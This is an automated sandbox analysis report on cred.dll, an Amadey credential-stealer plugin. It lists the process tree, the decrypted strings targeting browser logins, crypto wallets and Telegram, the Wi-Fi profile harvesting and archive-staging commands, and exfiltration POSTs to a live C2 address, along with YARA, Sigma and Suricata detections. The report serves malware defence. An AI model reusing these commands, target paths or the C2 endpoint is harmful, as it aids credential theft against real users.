Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cred.dll

Overview

General Information

Sample name:cred.dll
Analysis ID:1620561
MD5:fd8df0fc2168cb8c7959afaffa4d8031
SHA1:1715f77ca9c2d09d3fbbd5e42ae506be4157d961
SHA256:50f6ef79d5f5ba167a875bbf1438b8ff42a46ac5537127bb5a51f87bdc611620
Tags:dlluser-skocherhan
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7636 cmdline: loaddll32.exe "C:\Users\user\Desktop\cred.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7724 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7748 cmdline: rundll32.exe "C:\Users\user\Desktop\cred.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • netsh.exe (PID: 7772 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
          • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8016 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7732 cmdline: rundll32.exe C:\Users\user\Desktop\cred.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
      • netsh.exe (PID: 7796 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8008 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 8128 cmdline: rundll32.exe C:\Users\user\Desktop\cred.dll,Save MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7432 cmdline: rundll32.exe "C:\Users\user\Desktop\cred.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
      • netsh.exe (PID: 1152 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1868 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7420 cmdline: rundll32.exe "C:\Users\user\Desktop\cred.dll",Save MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
cred.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    cred.dllloader_amadey_stealer_pluginFinds Amadey\'s stealer plugin based on characteristic stringsSekoia.io
    • 0xfecec:$str01: STEALERDLL.dll
    • 0xfb0c0:$str02: ?wal=1
    • 0xfaffa:$str03: Content-Disposition: form-data; name="data"; filename="
    • 0xfb2c8:$str09: "hostname":"([^"]+)"
    • 0xfb2e0:$str10: "encryptedUsername":"([^"]+)"
    • 0xfb300:$str11: "encryptedPassword":"([^"]+)"
    • 0xfbb2c:$str12: &cred=

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\cred.dll,Main, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7732, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 8008, ProcessName: powershell.exe
    Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\cred.dll,Main, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7732, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 8008, ProcessName: powershell.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\cred.dll,Main, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7732, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 8008, ProcessName: powershell.exe

    Stealing of Sensitive Information

    barindex
    Sigma detected: Capture Wi-Fi password
    Source: Process startedAuthor: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\cred.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7748, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 7772, ProcessName: netsh.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-02-21T01:53:33.351067+010028552391A Network Trojan was detected192.168.2.849706185.196.8.3780TCP
    2025-02-21T01:53:33.351091+010028552391A Network Trojan was detected192.168.2.849707185.196.8.3780TCP
    2025-02-21T01:53:40.177381+010028552391A Network Trojan was detected192.168.2.849708185.196.8.3780TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://185.196.8.37/Gd85kkjf/index.phpAvira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1/Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=13Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1EAvira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1Avira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=1yqAvira URL Cloud: Label: malware
    Source: http://185.196.8.37/Gd85kkjf/index.php?wal=13lAvira URL Cloud: Label: malware
    Found malware configuration
    Source: cred.dllMalware Configuration Extractor: Amadey {"C2 url": "185.196.8.37/Gd85kkjf/index.php", "Version": "5.10"}
    Multi AV Scanner detection for submitted file
    Source: cred.dllReversingLabs: Detection: 76%
    Source: cred.dllVirustotal: Detection: 81%Perma Link
    Joe Sandbox ML detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
    Sample uses string decryption to hide its real strings
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Mozilla\Firefox\Profiles\
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Taskkill /IM ArmoryQt.exe /F
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Exodus\exodus.wallet\
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: _Electrum(
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Electrum.exe
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: electrum_data\wallets
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Electrum\wallets
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Litecoin\wallets
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: 185.196.8.37
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: /Gd85kkjf/index.php
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \logins.json
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: tdata\key_datas
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \user_data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \dictionaries
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Telegram.exe
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: CentBrowser
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: key=clear
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: atomic\Local Storage\
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: _Telegram(
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: _Desktop.zip
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: DashCore\wallets\
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \SputnikLab\Sputnik\User Data\Local State
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CentBrowser\User Data\Local State
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Chedot\User Data\Default\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Google\Chrome\User Data\Default\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Vivaldi\User Data\Default\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Google\Chrome\User Data\Local State
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Microsoft\Edge\User Data\Default\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Microsoft\Edge\User Data\Local State
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Orbitum\User Data\Default\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Comodo\Dragon\User Data\Default\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Comodo\Dragon\User Data\Local State
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: Taskkill /IM "Atomic Wallet.exe" /F
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Chromium\User Data\Default\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CocCoc\Browser\User Data\Default\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CocCoc\Browser\User Data\Local State
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Opera Software\Opera Stable\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \CentBrowser\User Data\Default\Login Data
    Source: 00000004.00000002.1680276783.0000000000A7A000.00000004.00000020.00020000.00000000.sdmpString decryptor: \Opera Software\Opera Stable\Local State
    Source: cred.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
    Source: cred.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1609053590.00000182F7A5E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1607601534.00000182F7A28000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1737048293.0000019048DCA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\dll\mscorlib.pdbA8? source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.1609053590.00000182F7A5E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1738172284.0000019048E1B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1608151993.00000182F7A2E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdb source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1605350402.00000182F79CD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb2 source: powershell.exe, 00000014.00000002.1736383296.0000019048D95000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbt` source: powershell.exe, 0000000C.00000002.1608151993.00000182F7A2E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1736383296.0000019048D95000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1732572937.0000019048AE5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer3281DD402BA65B9201D60593E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC9F596836F97C8F74750E5975C64E2189F source: powershell.exe, 00000014.00000002.1732572937.0000019048AE5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000014.00000002.1737048293.0000019048DCA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1737664936.0000019048E11000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.8:49708 -> 185.196.8.37:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.8:49707 -> 185.196.8.37:80
    Source: Network trafficSuricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.8:49706 -> 185.196.8.37:80
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.196.8.37 80Jump to behavior
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorIPs: 185.196.8.37
    Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: global trafficHTTP traffic detected: POST /Gd85kkjf/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NjE0Mw==Host: 185.196.8.37Content-Length: 6303Cache-Control: no-cache
    Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownTCP traffic detected without corresponding DNS query: 185.196.8.37
    Source: unknownHTTP traffic detected: POST /Gd85kkjf/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.196.8.37Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/-A2D8-08002B30309D
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/=1
    Source: rundll32.exe, 00000010.00000002.1748097265.000000000323A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000315A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php%q
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1/
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=13
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=13l
    Source: rundll32.exe, 00000005.00000002.1661438343.0000000003204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1E
    Source: rundll32.exe, 00000005.00000002.1661438343.000000000321D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.37/Gd85kkjf/index.php?wal=1yq
    Source: powershell.exe, 00000014.00000002.1737600529.0000019048DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
